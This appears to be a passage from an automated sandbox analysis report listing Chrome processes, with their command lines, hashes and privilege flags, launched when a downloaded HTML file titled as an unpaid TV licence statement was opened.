                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 --field-trial-handle=1956,i,1734018257759887342,15067520715141933685,262144 /prefetch:8
                                                                                                Imagebase:0x7ff76e190000
                                                                                                File size:3'242'272 bytes
                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:12
                                                                                                Start time:01:23:58
                                                                                                Start date:08/01/2025
                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Downloads\Unpaid TV License Statement- Copy.html"
                                                                                                Imagebase:0x7ff76e190000
                                                                                                File size:3'242'272 bytes
                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                Target ID:13
                                                                                                Start time:01:23:58
                                                                                                Start date:08/01/2025
                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1944,i,4660417916530889188,3192819211020463480,262144 /prefetch:8
                                                                                                Imagebase:0x7ff76e190000
                                                                                                File size:3'242'272 bytes
                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                No disassembly